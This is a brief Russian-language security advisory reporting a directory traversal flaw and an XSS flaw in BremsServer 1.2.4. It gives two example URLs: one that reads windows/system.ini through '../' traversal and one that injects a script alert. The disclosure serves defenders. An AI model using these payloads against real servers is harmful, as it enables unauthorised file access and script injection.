Программа: BremsServer 1.2.4
Уязвимость обнаружена в BremsServer. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может также выполнить XSS нападение.
1. http://[target]/../PATH/windows/system.ini
2. http://[target]/<script>alert("Test")</script>